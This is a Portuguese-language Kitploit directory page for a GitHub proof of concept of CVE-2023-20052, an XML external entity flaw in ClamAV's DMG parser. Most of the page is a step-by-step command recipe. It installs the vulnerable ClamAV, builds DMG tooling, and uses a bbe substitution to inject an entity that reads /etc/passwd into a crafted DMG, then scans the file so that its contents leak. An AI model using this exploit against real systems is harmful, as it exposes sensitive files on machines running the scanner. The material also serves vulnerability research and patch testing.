Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-20052 — CVE-2023-20052 – vulnerabilidade de vazamento de informações no parser de arquivos DMG do ClamAV | Kitploit
Ferramentas/GitHubGitHub/cy83rr0h1t/cve-2023-20052
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesAnálise de Malware
GitHubcy83rr0h1t/cve-2023-20052

CVE-2023-20052

CVE-2023-20052 – vulnerabilidade de vazamento de informações no parser de arquivos DMG do ClamAV

Ver Repositório
13há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-20052

Vulnerabilidade de vazamento de informações CVE-2023-20052 no analisador de arquivos DMG do ClamAV
Uma vulnerabilidade no analisador de arquivos DMG do ClamAV versões 1.0.0 e anteriores, 0.105.1 e anteriores, e 0.103.7 e anteriores poderia permitir que um atacante remoto não autenticado acessasse informações confidenciais em um dispositivo afetado. Essa vulnerabilidade se deve à habilitação da substituição de entidades XML, que pode resultar em injeção de entidade externa XML. Um atacante poderia explorar essa vulnerabilidade enviando um arquivo DMG malicioso para ser verificado pelo ClamAV em um dispositivo afetado. Uma exploração bem-sucedida poderia permitir que o atacante vazasse bytes de qualquer arquivo que pudesse ser lido pelo processo de verificação do ClamAV.

Testado no Ubuntu 20.04

Como instalar o ClamAV versão 1.0.0

  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.i686.deb
  • https://github.com/Cisco-Talos/clamav/releases/download/clamav-1.0.0/clamav-1.0.0.linux.x86_64.deb

sudo dpkg -i package-name.deb
1

  • sudo apt install -f

  • mkdir /usr/local/share/clamav

  • mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf
    2

  • sudo adduser clamav
    3

  • sudo chown -R 1002:1003 /usr/local/share/clamav

  • sudo freshclam
    4

5

  • clamscan --version
    6

Instalando mais algumas coisas necessárias para este exploit.

  • apt-get update

  • apt-get install -y ca-certificates gnupg wget

  • echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list

  • wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -

  • apt-get update -y

  • sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus
    7

  • git clone https://github.com/planetbeing/libdmg-hfsplus.git
    8

  • cd /libdmg-hfsplus

  • cmake .
    9

  • make
    10

  • cp dmg/dmg /bin
    sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
    11

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg 12

  • clamscan --debug exploit2.dmg 13

Referência: https://github.com/nokn0wthing/CVE-2023-20052

Baixar ferramenta